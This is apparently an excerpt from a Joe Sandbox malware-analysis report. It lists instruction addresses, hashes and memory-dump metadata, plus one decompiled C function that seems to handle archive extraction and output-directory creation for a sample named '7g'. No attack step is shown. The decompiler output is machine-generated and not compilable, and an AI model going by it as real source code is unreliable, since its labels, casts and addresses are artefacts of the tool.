                                                                                                                    0x00b2494d
                                                                                                                    0x00b24950
                                                                                                                    0x00b24954
                                                                                                                    0x00b24954
                                                                                                                    0x00b24960
                                                                                                                    0x00b24969
                                                                                                                    0x00b2496d
                                                                                                                    0x00b2497b
                                                                                                                    0x00b24981
                                                                                                                    0x00b24985
                                                                                                                    0x00b2498e
                                                                                                                    0x00b24992
                                                                                                                    0x00b2499a
                                                                                                                    0x00b2499e
                                                                                                                    0x00b249a4
                                                                                                                    0x00b249ab
                                                                                                                    0x00b24a45
                                                                                                                    0x00b24a4c
                                                                                                                    0x00b24a8a
                                                                                                                    0x00b24a8e
                                                                                                                    0x00b24ab8
                                                                                                                    0x00b24ab8
                                                                                                                    0x00b24abb
                                                                                                                    0x00b24ac5
                                                                                                                    0x00b24aca
                                                                                                                    0x00b24ace
                                                                                                                    0x00b24ad8
                                                                                                                    0x00b24ade
                                                                                                                    0x00b24b3a
                                                                                                                    0x00b24b40
                                                                                                                    0x00b24ba9
                                                                                                                    0x00b24ba9
                                                                                                                    0x00b24bab
                                                                                                                    0x00b24bb1
                                                                                                                    0x00b24bb4
                                                                                                                    0x00b24bb6
                                                                                                                    0x00b24bba
                                                                                                                    0x00b24c20
                                                                                                                    0x00b24c20
                                                                                                                    0x00b24bbc
                                                                                                                    0x00b24bc3
                                                                                                                    0x00b24bc3
                                                                                                                    0x00b24c22
                                                                                                                    0x00b24c24
                                                                                                                    0x00b24c27
                                                                                                                    0x00b24c2b
                                                                                                                    0x00b24c31
                                                                                                                    0x00b24c34
                                                                                                                    0x00b24c39
                                                                                                                    0x00b24c39
                                                                                                                    0x00b24c44
                                                                                                                    0x00b24c4a
                                                                                                                    0x00b24c4e
                                                                                                                    0x00b24c53
                                                                                                                    0x00b24c57
                                                                                                                    0x00b24c60
                                                                                                                    0x00b24c65
                                                                                                                    0x00b24c67
                                                                                                                    0x00b24c9e
                                                                                                                    0x00b24ca1
                                                                                                                    0x00b24ca5
                                                                                                                    0x00b24cac
                                                                                                                    0x00b24d86
                                                                                                                    0x00b24d86
                                                                                                                    0x00b24d8a
                                                                                                                    0x00b24e1c
                                                                                                                    0x00b24e1c
                                                                                                                    0x00b24e23
                                                                                                                    0x00b24e25
                                                                                                                    0x00b24e2c
                                                                                                                    0x00b24e34
                                                                                                                    0x00b24e3b
                                                                                                                    0x00b24e4c
                                                                                                                    0x00b24e4f
                                                                                                                    0x00b24e5b
                                                                                                                    0x00b24e5f
                                                                                                                    0x00b24e67
                                                                                                                    0x00b24e69
                                                                                                                    0x00b24e74
                                                                                                                    0x00b24e77
                                                                                                                    0x00b24e77
                                                                                                                    0x00b24e7f
                                                                                                                    0x00b24e83
                                                                                                                    0x00b24e88
                                                                                                                    0x00b24e8b
                                                                                                                    0x00b24e2c
                                                                                                                    0x00b24e8c
                                                                                                                    0x00b24e90
                                                                                                                    0x00b24ec0
                                                                                                                    0x00b24ec4
                                                                                                                    0x00b24ec9
                                                                                                                    0x00b24ed0
                                                                                                                    0x00b24ed5
                                                                                                                    0x00b24ed8
                                                                                                                    0x00b24edc
                                                                                                                    0x00b24edf
                                                                                                                    0x00000000
                                                                                                                    0x00b24e92
                                                                                                                    0x00b24ea8
                                                                                                                    0x00b24eaa
                                                                                                                    0x00b24eac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24eae
                                                                                                                    0x00b24eae
                                                                                                                    0x00b24eb0
                                                                                                                    0x00b24eb4
                                                                                                                    0x00b24eb9
                                                                                                                    0x00b24eb9
                                                                                                                    0x00b24ebc
                                                                                                                    0x00000000
                                                                                                                    0x00b24ebc
                                                                                                                    0x00b24e90
                                                                                                                    0x00b24d90
                                                                                                                    0x00b24d94
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24d9a
                                                                                                                    0x00b24d9c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24d9e
                                                                                                                    0x00b24da4
                                                                                                                    0x00b24daa
                                                                                                                    0x00b24dac
                                                                                                                    0x00b24db2
                                                                                                                    0x00b24db2
                                                                                                                    0x00b24db8
                                                                                                                    0x00b24dc9
                                                                                                                    0x00b24dce
                                                                                                                    0x00b24dd0
                                                                                                                    0x00b24dd3
                                                                                                                    0x00b24df0
                                                                                                                    0x00b24df9
                                                                                                                    0x00b24dfe
                                                                                                                    0x00b24e00
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24e07
                                                                                                                    0x00b24e08
                                                                                                                    0x00b24e12
                                                                                                                    0x00b24e14
                                                                                                                    0x00b24e16
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24e16
                                                                                                                    0x00b24dda
                                                                                                                    0x00b24ddb
                                                                                                                    0x00b24de6
                                                                                                                    0x00b24de8
                                                                                                                    0x00b24dea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24dea
                                                                                                                    0x00b24dae
                                                                                                                    0x00b24db0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24db0
                                                                                                                    0x00b24cb2
                                                                                                                    0x00b24cb8
                                                                                                                    0x00b24cbe
                                                                                                                    0x00b24cc0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24cc6
                                                                                                                    0x00b24cc8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24cce
                                                                                                                    0x00b24cd0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24cd6
                                                                                                                    0x00b24ce0
                                                                                                                    0x00b24ce0
                                                                                                                    0x00b24ce7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24cf8
                                                                                                                    0x00b24cfd
                                                                                                                    0x00b24d05
                                                                                                                    0x00b24d0c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24d0e
                                                                                                                    0x00b24d15
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24d17
                                                                                                                    0x00b24d17
                                                                                                                    0x00b24d17
                                                                                                                    0x00b24d1b
                                                                                                                    0x00b24d27
                                                                                                                    0x00b24d2c
                                                                                                                    0x00b24d2e
                                                                                                                    0x00b24d33
                                                                                                                    0x00b24d36
                                                                                                                    0x00b24d44
                                                                                                                    0x00b24d44
                                                                                                                    0x00b24d38
                                                                                                                    0x00b24d38
                                                                                                                    0x00b24d3c
                                                                                                                    0x00b24d3c
                                                                                                                    0x00b24d46
                                                                                                                    0x00b24d55
                                                                                                                    0x00b24d57
                                                                                                                    0x00b24d5c
                                                                                                                    0x00b24d6a
                                                                                                                    0x00b24d6e
                                                                                                                    0x00b24d71
                                                                                                                    0x00b24d79
                                                                                                                    0x00b24d7e
                                                                                                                    0x00000000
                                                                                                                    0x00b24d7e
                                                                                                                    0x00b24cff
                                                                                                                    0x00000000
                                                                                                                    0x00b24cff
                                                                                                                    0x00b24cd8
                                                                                                                    0x00b24cda
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24c69
                                                                                                                    0x00b24c6e
                                                                                                                    0x00b24c6f
                                                                                                                    0x00b24c7a
                                                                                                                    0x00b24c7c
                                                                                                                    0x00b24c80
                                                                                                                    0x00b24c82
                                                                                                                    0x00b24c97
                                                                                                                    0x00b24ee1
                                                                                                                    0x00b24ee1
                                                                                                                    0x00b24ee6
                                                                                                                    0x00b24ee6
                                                                                                                    0x00b24ee9
                                                                                                                    0x00b24ee9
                                                                                                                    0x00b24eeb
                                                                                                                    0x00b24ef6
                                                                                                                    0x00b24efc
                                                                                                                    0x00000000
                                                                                                                    0x00b24efe
                                                                                                                    0x00b24c84
                                                                                                                    0x00b24c86
                                                                                                                    0x00b24c8f
                                                                                                                    0x00b24c8f
                                                                                                                    0x00000000
                                                                                                                    0x00b24c86
                                                                                                                    0x00b24c67
                                                                                                                    0x00b24b42
                                                                                                                    0x00b24b49
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24b4b
                                                                                                                    0x00b24b52
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24b5d
                                                                                                                    0x00b24b61
                                                                                                                    0x00b24b62
                                                                                                                    0x00b24b67
                                                                                                                    0x00b24b69
                                                                                                                    0x00b24aa3
                                                                                                                    0x00b24aa3
                                                                                                                    0x00000000
                                                                                                                    0x00b24aa3
                                                                                                                    0x00b24b6f
                                                                                                                    0x00b24b73
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24b86
                                                                                                                    0x00b24b8b
                                                                                                                    0x00b24b8e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24b96
                                                                                                                    0x00b24b99
                                                                                                                    0x00b24b9c
                                                                                                                    0x00b24bcc
                                                                                                                    0x00b24bd1
                                                                                                                    0x00b24bd3
                                                                                                                    0x00b24bfc
                                                                                                                    0x00b24c07
                                                                                                                    0x00b24c12
                                                                                                                    0x00b24c18
                                                                                                                    0x00000000
                                                                                                                    0x00b24c1a
                                                                                                                    0x00b24bd5
                                                                                                                    0x00b24bdd
                                                                                                                    0x00b24bde
                                                                                                                    0x00b24be1
                                                                                                                    0x00b24be7
                                                                                                                    0x00b24be8
                                                                                                                    0x00b24bed
                                                                                                                    0x00b24bef
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24bf5
                                                                                                                    0x00b24ba4
                                                                                                                    0x00000000
                                                                                                                    0x00b24ba4
                                                                                                                    0x00b24ae0
                                                                                                                    0x00b24ae7
                                                                                                                    0x00b24aed
                                                                                                                    0x00b24af1
                                                                                                                    0x00b24af2
                                                                                                                    0x00b24af5
                                                                                                                    0x00b24afa
                                                                                                                    0x00b24afc
                                                                                                                    0x00b24afe
                                                                                                                    0x00b24b19
                                                                                                                    0x00b24b1d
                                                                                                                    0x00b24b1f
                                                                                                                    0x00b24b24
                                                                                                                    0x00b24b24
                                                                                                                    0x00b24b27
                                                                                                                    0x00b24b2a
                                                                                                                    0x00b24b2a
                                                                                                                    0x00b24b2f
                                                                                                                    0x00b24b32
                                                                                                                    0x00000000
                                                                                                                    0x00b24b32
                                                                                                                    0x00b24b0b
                                                                                                                    0x00b24b11
                                                                                                                    0x00000000
                                                                                                                    0x00b24b13
                                                                                                                    0x00b24ad0
                                                                                                                    0x00000000
                                                                                                                    0x00b24ad0
                                                                                                                    0x00b24a90
                                                                                                                    0x00b24a96
                                                                                                                    0x00b24a97
                                                                                                                    0x00b24a9a
                                                                                                                    0x00b24a9f
                                                                                                                    0x00b24aa1
                                                                                                                    0x00b24aaa
                                                                                                                    0x00b24aad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24ab3
                                                                                                                    0x00000000
                                                                                                                    0x00b24ab3
                                                                                                                    0x00000000
                                                                                                                    0x00b24aa1
                                                                                                                    0x00b24a4e
                                                                                                                    0x00b24a5a
                                                                                                                    0x00b24a63
                                                                                                                    0x00b24a67
                                                                                                                    0x00b24a67
                                                                                                                    0x00b24a72
                                                                                                                    0x00000000
                                                                                                                    0x00b24a74
                                                                                                                    0x00b24a78
                                                                                                                    0x00b24a80
                                                                                                                    0x00b24a80
                                                                                                                    0x00000000
                                                                                                                    0x00b24a78
                                                                                                                    0x00b24a72
                                                                                                                    0x00b249b1
                                                                                                                    0x00b249ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b249c3
                                                                                                                    0x00b249c6
                                                                                                                    0x00b249cb
                                                                                                                    0x00b249d7
                                                                                                                    0x00b249e3
                                                                                                                    0x00b249e5
                                                                                                                    0x00b249e9
                                                                                                                    0x00b249f2
                                                                                                                    0x00b24a00
                                                                                                                    0x00b24a0a
                                                                                                                    0x00b24a19
                                                                                                                    0x00b24a21
                                                                                                                    0x00b24a25
                                                                                                                    0x00b24a31
                                                                                                                    0x00b24a39
                                                                                                                    0x00b24a3d
                                                                                                                    0x00b24a42
                                                                                                                    0x00b24a43
                                                                                                                    0x00000000
                                                                                                                    0x00b24a43
                                                                                                                    0x00b24972
                                                                                                                    0x00b24977
                                                                                                                    0x00b24979
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b24979

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B248E8
                                                                                                                      • Part of subcall function 00B241B9: __EH_prolog.LIBCMT ref: 00B241BE
                                                                                                                      • Part of subcall function 00B24329: __EH_prolog.LIBCMT ref: 00B2432E
                                                                                                                      • Part of subcall function 00B324E9: __EH_prolog.LIBCMT ref: 00B324EE
                                                                                                                      • Part of subcall function 00B244BA: __EH_prolog.LIBCMT ref: 00B244BF
                                                                                                                      • Part of subcall function 00B245B7: __EH_prolog.LIBCMT ref: 00B245BC
                                                                                                                    Strings
                                                                                                                    • Cannot seek to begin of file, xrefs: 00B24E08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Cannot seek to begin of file
                                                                                                                    • API String ID: 3519838083-2298593816
                                                                                                                    • Opcode ID: cf66a4de4744deb8fc2f6c606152b241538132d26f961428b972894a9e6815ef
                                                                                                                    • Instruction ID: 513f60728bb972304f327ada03f3df32abd3b9789a7e1d89ab2996d3cfdb4e0e
                                                                                                                    • Opcode Fuzzy Hash: cf66a4de4744deb8fc2f6c606152b241538132d26f961428b972894a9e6815ef
                                                                                                                    • Instruction Fuzzy Hash: 9C1211319002559FDF25EBA8D484BEEBBF4EF15310F14049EE44AA7691DB70AE85CB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B31ADA Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00B31ADA(signed int __ecx, intOrPtr* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t186;
				void* _t194;
				void* _t195;
				void* _t197;
				signed int _t203;
				intOrPtr* _t213;
				signed int _t215;
				signed int _t217;
				signed int _t228;
				intOrPtr* _t237;
				signed int _t243;
				signed int _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t252;
				intOrPtr _t256;
				intOrPtr* _t270;
				intOrPtr _t316;
				intOrPtr* _t334;
				signed int _t336;
				intOrPtr _t338;
				intOrPtr _t339;
				intOrPtr* _t342;
				signed int _t343;
				intOrPtr* _t345;
				intOrPtr* _t346;
				void* _t347;
				void* _t353;
				void* _t357;

				_t353 = __eflags;
				L00B7F140(E00B849F3, _t347);
				_t334 = __edx;
				 *(_t347 - 0x18) = __ecx;
				_t186 =  *((intOrPtr*)( *__edx +  *(__edx + 4) * 4 - 4));
				_t270 =  *((intOrPtr*)(_t347 + 0x2c));
				 *((intOrPtr*)(_t347 - 0x14)) = _t186;
				 *_t270 = 0;
				 *((intOrPtr*)(_t270 + 4)) = 0;
				 *((intOrPtr*)(_t347 - 0x24)) = 0;
				 *((intOrPtr*)(_t347 - 0x28)) =  *_t186;
				 *(_t347 - 0x20) = 0;
				 *((intOrPtr*)(_t347 - 0x1c)) = 0;
				 *((intOrPtr*)(_t347 - 4)) = 0;
				E00B56896(_t347 - 0x58);
				_t342 =  *((intOrPtr*)(_t347 + 0x14));
				 *((char*)(_t347 - 4)) = 1;
				_t18 = _t342 + 0x14; // 0x80004018
				E00B12EA8(_t347 - 0x34, _t353, _t18);
				 *((char*)(_t347 - 4)) = 2;
				E00B12EA8(_t347 - 0x74, _t353,  *((intOrPtr*)(_t347 - 0x14)) + 0x30);
				 *((char*)(_t347 - 4)) = 3;
				if( *((intOrPtr*)(_t334 + 4)) > 1) {
					_t339 =  *((intOrPtr*)( *_t334));
					_t260 =  *(_t339 + 0x3c);
					if( *(_t339 + 0x3c) >= 0 && E00B12450( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t347 - 0x18) + 8)) + _t260 * 4)) + 0x10)), "pe") != 0) {
						_t357 = _t339 + 0x30;
						L00B12F78(_t347 - 0x74, _t339 + 0x30);
					}
				}
				_t323 = _t347 - 0x74;
				_t194 = E00B32199(_t347 - 0x64, _t347 - 0x74, _t357);
				 *((char*)(_t347 - 4)) = 4;
				_t195 = L00B12E16(_t347 - 0x4c, 0xb89390);
				 *((char*)(_t347 - 4)) = 5;
				_t197 = E00B11E89(L00B13463(_t347 - 0x34, _t195, _t194),  *((intOrPtr*)(_t347 - 0x4c)));
				 *((char*)(_t347 - 4)) = 3;
				E00B11E89(_t197,  *((intOrPtr*)(_t347 - 0x64)));
				 *(_t347 + 0x17) = 0;
				E00B12D90(_t347 - 0x40);
				 *((char*)(_t347 - 4)) = 6;
				E00B12EA8(_t347 - 0x80, _t357, _t347 - 0x34);
				 *((char*)(_t347 - 4)) = 7;
				if( *_t342 != 0 &&  *((intOrPtr*)(_t342 + 8)) != 3) {
					E00B12D90(_t347 - 0x4c);
					 *((char*)(_t347 - 4)) = 8;
					_t256 = E00B1447A(_t347 - 0x34, _t347 - 0x4c, _t347 - 0x40);
					_t323 =  *(_t347 - 0x3c);
					if(_t323 != 0) {
						_t256 =  *((intOrPtr*)(_t347 - 0x40));
						_t316 =  *((intOrPtr*)(_t256 + _t323 * 2 - 2));
						if(_t316 == 0x5c || _t316 == 0x2f) {
							_t323 = _t323 - 1;
							 *(_t347 - 0x3c) = _t323;
							 *((short*)(_t256 + _t323 * 2)) = 0;
						}
						if( *(_t347 - 0x3c) != 0) {
							_t256 = L00B12F78(_t347 - 0x80, _t347 - 0x4c);
							 *(_t347 + 0x17) = 1;
						}
					}
					 *((char*)(_t347 - 4)) = 7;
					E00B11E89(_t256,  *((intOrPtr*)(_t347 - 0x4c)));
				}
				 *(_t347 - 0xd) = E00B146D8(0,  *(_t347 + 0x10), _t323, _t342);
				if( *(_t342 + 0x3c) != 0) {
					L48:
					__eflags =  *(_t347 + 0x17);
					if( *(_t347 + 0x17) != 0) {
						E00B56B33(_t347 - 0x58);
						_push(_t347 - 0x40);
						E00B11524(_t347 - 0x58);
					}
					__eflags =  *(_t347 - 0x30);
					if(__eflags != 0) {
						_t203 = E00B15B2F( *((intOrPtr*)(_t347 - 0x34)), __eflags); // executed
						__eflags = _t203;
						if(__eflags != 0) {
							goto L52;
						}
						_t343 = L00B1729C();
						_push( *((intOrPtr*)(_t347 + 0x28)));
						_push(_t343);
						_t217 = L00B31A6B("Cannot create output directory", _t347 - 0x34, __eflags);
						goto L73;
					} else {
						L00B13076(_t347 - 0x34, 0xb893f4);
						L52:
						_t336 =  *(_t347 + 0x24);
						asm("sbb eax, eax");
						_t136 = _t342 + 0x20; // 0x80004024
						L00B234F7(_t336, __eflags, _t136,  ~( *(_t342 + 0x3c)) &  *(_t347 + 0x10),  *((intOrPtr*)(_t347 - 0x14)),  *((intOrPtr*)(_t347 + 0x20)),  *((intOrPtr*)(_t342 + 0x3d)),  *(_t342 + 0x3f), _t347 - 0x34, _t347 - 0x58, 0,  *((intOrPtr*)(_t347 + 8)),  *((intOrPtr*)(_t347 + 0xc)));
						__eflags =  *(_t342 + 0x3c);
						if( *(_t342 + 0x3c) != 0) {
							L56:
							__eflags =  *(_t342 + 0x3f);
							if( *(_t342 + 0x3f) == 0) {
								L61:
								__eflags = 0;
								L62:
								 *(_t347 + 0x10) = _t336;
								__eflags =  *(_t342 + 0x3c);
								 *((char*)(_t347 - 4)) = 0xa;
								if( *(_t342 + 0x3c) == 0) {
									_t213 =  *((intOrPtr*)(_t347 - 0x28));
									 *(_t347 + 0x18) =  *((intOrPtr*)( *_t213 + 0x1c))(_t213,  *((intOrPtr*)(_t347 - 0x24)),  *(_t347 - 0x20), 0, _t336);
								} else {
									_t345 =  *((intOrPtr*)(_t347 - 0x28));
									 *(_t347 + 0x18) =  *((intOrPtr*)( *_t345 + 0x1c))(_t345, 0, 0xffffffff, 0, _t336);
									 *((short*)(_t347 - 0x68)) = 0;
									 *((short*)(_t347 - 0x66)) = 0;
									 *((intOrPtr*)(_t347 - 0x60)) = 0;
									 *((char*)(_t347 - 4)) = 0xb;
									_t228 =  *((intOrPtr*)( *_t345 + 0x20))(_t345, 0x2c, _t347 - 0x68);
									__eflags = _t228;
									if(_t228 == 0) {
										E00B22EE5(_t347 - 0x68,  *((intOrPtr*)(_t347 + 0x2c)));
									}
									 *((char*)(_t347 - 4)) = 0xa;
									L00B19312(_t347 - 0x68);
								}
								_t215 = 0;
								__eflags = _t336;
								if(__eflags != 0) {
									_t215 = E00B2652B(_t336, __eflags);
									 *(_t347 + 0x10) = 0;
								}
								__eflags =  *(_t347 + 0x18);
								if( *(_t347 + 0x18) == 0) {
									 *(_t347 + 0x18) = _t215;
								}
								_t217 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x1c)))) + 0xc))( *(_t347 + 0x18));
								_t286 =  *(_t347 + 0x10);
								_t343 = _t217;
								__eflags =  *(_t347 + 0x10);
								 *((char*)(_t347 - 4)) = 7;
								if(__eflags != 0) {
									_t217 = E00B2652B(_t286, __eflags);
								}
								goto L73;
							}
							L57:
							__eflags =  *(_t347 + 0x18);
							if( *(_t347 + 0x18) != 0) {
								goto L61;
							}
							_push(1);
							_pop(0);
							goto L62;
						}
						__eflags =  *(_t342 + 0x3f);
						if( *(_t342 + 0x3f) != 0) {
							goto L57;
						}
						__eflags =  *(_t342 + 0x26);
						if(__eflags == 0) {
							goto L56;
						}
						_t217 = E00B22C55(_t336, __eflags, _t347 - 0x24);
						__eflags = _t217;
						if(_t217 != 0) {
							goto L15;
						}
						goto L56;
					}
				} else {
					_t237 =  *((intOrPtr*)(_t347 - 0x28));
					_t217 =  *((intOrPtr*)( *_t237 + 0x14))(_t237, _t347 - 0x18);
					if(_t217 == 0) {
						L00B23104(_t347 - 0xc0, __eflags);
						_t338 = 0;
						__eflags =  *(_t347 - 0x18);
						 *((char*)(_t347 - 4)) = 9;
						if( *(_t347 - 0x18) <= 0) {
							L44:
							__eflags =  *(_t347 - 0x20);
							if( *(_t347 - 0x20) != 0) {
								 *((char*)(_t347 - 4)) = 7;
								L00B2342C(_t347 - 0xc0);
								goto L48;
							}
							_t346 =  *((intOrPtr*)(_t347 + 0x1c));
							 *((intOrPtr*)( *_t346 + 8))();
							_t243 =  *((intOrPtr*)( *_t346 + 0xc))(0);
							L46:
							_t343 = _t243;
							 *((char*)(_t347 - 4)) = 7;
							_t217 = L00B2342C(_t347 - 0xc0);
							L73:
							E00B11E89(E00B11E89(E00B11E89(E00B11E89(_t217,  *((intOrPtr*)(_t347 - 0x80))),  *((intOrPtr*)(_t347 - 0x40))),  *(_t347 - 0x74)),  *((intOrPtr*)(_t347 - 0x34)));
							 *((char*)(_t347 - 4)) = 0;
							E00B11E89(L00B41B84(0, _t347 - 0x58),  *((intOrPtr*)(_t347 - 0x24)));
							 *[fs:0x0] =  *((intOrPtr*)(_t347 - 0xc));
							return _t343;
						} else {
							goto L17;
						}
						do {
							L17:
							__eflags =  *(_t347 + 0x17);
							if(__eflags != 0) {
								L25:
								_push(_t347 - 0xc0);
								_push(_t338);
								_t243 = L00B37D76( *((intOrPtr*)(_t347 - 0x14)), __eflags);
								__eflags = _t243;
								if(_t243 != 0) {
									goto L46;
								}
								__eflags =  *(_t347 - 0x8e);
								if( *(_t347 - 0x8e) == 0) {
									_t245 =  *(_t342 + 3);
								} else {
									_t245 =  *(_t342 + 2);
								}
								__eflags = _t245;
								if(_t245 != 0) {
									goto L43;
								} else {
									L30:
									__eflags =  *(_t342 + 0x28);
									if( *(_t342 + 0x28) != 0) {
										L32:
										__eflags =  *(_t347 + 0x17);
										if( *(_t347 + 0x17) == 0) {
											L40:
											__eflags =  *(_t347 - 0xd);
											if(__eflags != 0) {
												L42:
												E00B56B33(_t347 - 0x24);
												_t106 = _t347 - 0x20;
												 *_t106 =  *(_t347 - 0x20) + 1;
												__eflags =  *_t106;
												 *((intOrPtr*)( *((intOrPtr*)(_t347 - 0x24)) +  *(_t347 - 0x20) * 4)) = _t338;
												goto L43;
											}
											_t248 = L00B23E09( *(_t347 + 0x10), __eflags);
											__eflags = _t248;
											if(_t248 == 0) {
												goto L43;
											}
											goto L42;
										}
										_t249 = E00B1429E( *((intOrPtr*)(_t347 - 0xa8)),  *((intOrPtr*)(_t347 - 0x40)));
										__eflags = _t249;
										if(_t249 == 0) {
											L39:
											 *(_t347 + 0x17) = 0;
											goto L40;
										}
										_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t347 - 0xa8)) +  *(_t347 - 0x3c) * 2));
										__eflags = _t251;
										if(_t251 != 0) {
											__eflags = _t251 - 0x5c;
											if(_t251 == 0x5c) {
												goto L40;
											}
											__eflags = _t251 - 0x2f;
											if(_t251 == 0x2f) {
												goto L40;
											}
											goto L39;
										}
										__eflags =  *(_t347 - 0x8d);
										if( *(_t347 - 0x8d) != 0) {
											goto L40;
										}
										goto L39;
									}
									__eflags =  *(_t347 - 0x90);
									if( *(_t347 - 0x90) != 0) {
										goto L43;
									}
									goto L32;
								}
							}
							__eflags =  *(_t347 - 0xd);
							if(__eflags == 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 2);
							if(__eflags != 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 3);
							if(__eflags != 0) {
								goto L25;
							}
							__eflags =  *(_t342 + 0x28);
							 *(_t347 - 0x90) = 0;
							if( *(_t342 + 0x28) != 0) {
								goto L32;
							}
							_t252 =  *((intOrPtr*)(_t347 - 0x14));
							__eflags =  *(_t252 + 0x14);
							if( *(_t252 + 0x14) == 0) {
								goto L30;
							}
							_t243 = L00B37952(_t347 - 0x90);
							__eflags = _t243;
							if(_t243 != 0) {
								goto L46;
							} else {
								goto L30;
							}
							L43:
							_t338 = _t338 + 1;
							__eflags = _t338 -  *(_t347 - 0x18);
						} while (_t338 <  *(_t347 - 0x18));
						goto L44;
					}
					L15:
					_t343 = _t217;
					goto L73;
				}
			}



































                                                                                                                    0x00b31ada
                                                                                                                    0x00b31adf
                                                                                                                    0x00b31aed
                                                                                                                    0x00b31aef
                                                                                                                    0x00b31af9
                                                                                                                    0x00b31afd
                                                                                                                    0x00b31b00
                                                                                                                    0x00b31b03
                                                                                                                    0x00b31b05
                                                                                                                    0x00b31b0a
                                                                                                                    0x00b31b0d
                                                                                                                    0x00b31b10
                                                                                                                    0x00b31b13
                                                                                                                    0x00b31b19
                                                                                                                    0x00b31b1c
                                                                                                                    0x00b31b21
                                                                                                                    0x00b31b27
                                                                                                                    0x00b31b2b
                                                                                                                    0x00b31b2f
                                                                                                                    0x00b31b3d
                                                                                                                    0x00b31b42
                                                                                                                    0x00b31b4b
                                                                                                                    0x00b31b4f
                                                                                                                    0x00b31b53
                                                                                                                    0x00b31b55
                                                                                                                    0x00b31b5a
                                                                                                                    0x00b31b78
                                                                                                                    0x00b31b7f
                                                                                                                    0x00b31b7f
                                                                                                                    0x00b31b5a
                                                                                                                    0x00b31b84
                                                                                                                    0x00b31b8a
                                                                                                                    0x00b31b99
                                                                                                                    0x00b31b9d
                                                                                                                    0x00b31ba7
                                                                                                                    0x00b31bb3
                                                                                                                    0x00b31bbb
                                                                                                                    0x00b31bbf
                                                                                                                    0x00b31bc5
                                                                                                                    0x00b31bcc
                                                                                                                    0x00b31bd8
                                                                                                                    0x00b31bdc
                                                                                                                    0x00b31be3
                                                                                                                    0x00b31be7
                                                                                                                    0x00b31bf2
                                                                                                                    0x00b31c01
                                                                                                                    0x00b31c05
                                                                                                                    0x00b31c0a
                                                                                                                    0x00b31c0f
                                                                                                                    0x00b31c11
                                                                                                                    0x00b31c14
                                                                                                                    0x00b31c1d
                                                                                                                    0x00b31c25
                                                                                                                    0x00b31c26
                                                                                                                    0x00b31c29
                                                                                                                    0x00b31c29
                                                                                                                    0x00b31c30
                                                                                                                    0x00b31c39
                                                                                                                    0x00b31c3e
                                                                                                                    0x00b31c3e
                                                                                                                    0x00b31c30
                                                                                                                    0x00b31c45
                                                                                                                    0x00b31c49
                                                                                                                    0x00b31c4e
                                                                                                                    0x00b31c5a
                                                                                                                    0x00b31c5d
                                                                                                                    0x00b31dc4
                                                                                                                    0x00b31dc4
                                                                                                                    0x00b31dc7
                                                                                                                    0x00b31dcc
                                                                                                                    0x00b31dd7
                                                                                                                    0x00b31dd8
                                                                                                                    0x00b31dd8
                                                                                                                    0x00b31ddd
                                                                                                                    0x00b31de0
                                                                                                                    0x00b31e59
                                                                                                                    0x00b31e5e
                                                                                                                    0x00b31e60
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b31e67
                                                                                                                    0x00b31e6c
                                                                                                                    0x00b31e74
                                                                                                                    0x00b31e75
                                                                                                                    0x00000000
